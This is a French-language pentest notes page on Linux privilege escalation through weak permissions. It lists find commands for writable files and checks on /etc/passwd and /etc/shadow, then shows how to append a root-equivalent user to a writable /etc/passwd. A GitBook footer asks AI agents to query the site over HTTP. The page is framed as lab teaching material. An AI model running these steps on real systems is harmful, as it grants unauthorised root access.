> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/fr/privesc/permissions.md).

# Permissions

L'élévation de privilèges basée sur les permissions abuse des fichiers inscriptibles, d'une propriété faible, de secrets exposés ou de chemins sensibles qui ne devraient être contrôlés que par root. De petites erreurs de permissions peuvent se transformer en accès root direct lorsqu'elles touchent des fichiers d'authentification ou des chemins d'exécution privilégiés.

## Méthodologie

* Recherchez les fichiers et répertoires inscriptibles en dehors des emplacements contrôlés par l'utilisateur attendus.
* Vérifiez le propriétaire et les permissions de groupe sur les fichiers sensibles tels que `/etc/passwd`, les sauvegardes, les scripts et les fichiers de configuration des services.
* Utilisez une énumération automatisée pour détecter les erreurs de permissions cachées, puis validez-les manuellement.

## Vérifications rapides

```bash
find / -writable 2>/dev/null
find /etc -writable -type f 2>/dev/null
ls -la /etc/passwd /etc/shadow 2>/dev/null
```

{% hint style="info" %}
Des erreurs de configuration des permissions exposent des fichiers sensibles, des chemins inscriptibles ou des actions réservées à l'administrateur à des utilisateurs peu privilégiés. Validez toujours les fichiers inscriptibles, le propriétaire, l'accès au groupe et le contexte d'exécution.
{% endhint %}

## Fichiers sensibles inscriptibles

Priorisez les fichiers système inscriptibles, la configuration des services, les sauvegardes et les scripts exécutés par root.

```bash
find /etc -writable -type f 2>/dev/null
find /etc/service/ -writable 2>/dev/null
find / -writable -name "*.service" 2>/dev/null
find / -writable -path "/etc/systemd/system/*" 2>/dev/null
```

### `/etc/passwd` Abus

Si `/etc/passwd` est inscriptible, générez un hachage contrôlé et ajoutez un utilisateur temporaire équivalent à root uniquement dans un laboratoire ou sur une cible autorisée :

```bash
openssl passwd -1 -salt xyz password123
echo 'malicious:$1$xyz$SomeHashedPasswordHere:0:0::/root:/bin/bash' >> /etc/passwd
su malicious
```

<table data-view="cards" data-full-width="false" data-search="false"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th></tr></thead><tbody><tr><td><h3><i class="fa-key" style="color:$primary;">:key:</i></h3></td><td><h4>Calculateur de permissions Linux</h4></td><td>Recherchez des permissions octales et symboliques, convertissez les modes, examinez les bits SUID/SGID/sticky et évaluez le risque d'élévation de privilèges.</td><td><a href="/pages/153f601af26d81bf75ca76b68373e5f19e1487b0">/pages/153f601af26d81bf75ca76b68373e5f19e1487b0</a></td></tr><tr><td><h3><i class="fa-magnifying-glass" style="color:$primary;">:magnifying-glass:</i></h3></td><td><h4>Énumération intelligente</h4></td><td>Notes sur l'outil Smart Enumeration pour l'élévation de privilèges sous Linux, avec des étapes d'énumération, des exemples d'exploitation et une validation axée sur le rapport.</td><td><a href="/pages/253d6edb39fd8554da1ad36af67348212d4a5417">/pages/253d6edb39fd8554da1ad36af67348212d4a5417</a></td></tr><tr><td><h3><i class="fa-shield-halved" style="color:$primary;">:shield-halved:</i></h3></td><td><h4>Abus d'écriture sur /etc/passwd</h4></td><td>Notes sur la gestion des permissions (/etc/passwd) pour l'élévation de privilèges sous Linux, avec des étapes d'énumération, des exemples d'exploitation et une validation axée sur le rapport.</td><td><a href="/pages/6b4b5bbf1cb5dc0da87231ee6886fc93768aad42">/pages/6b4b5bbf1cb5dc0da87231ee6886fc93768aad42</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/fr/privesc/permissions.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
